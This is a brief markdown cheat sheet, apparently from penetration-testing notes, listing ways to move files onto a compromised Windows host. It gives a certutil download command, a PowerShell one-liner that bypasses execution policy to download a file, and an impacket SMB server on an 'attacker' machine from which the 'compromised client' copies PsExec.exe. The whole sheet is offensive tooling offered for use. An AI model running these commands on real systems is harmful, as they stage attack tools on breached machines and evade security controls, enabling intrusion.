file_transfer_windows.md

windows' file transfer

certutil

certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]

powershell

powershell -ExecutionPolicy Bypass -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

smb

#attacker
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py share ./
#compromised client
copy \\192.168.119.163\share\PsExec.exe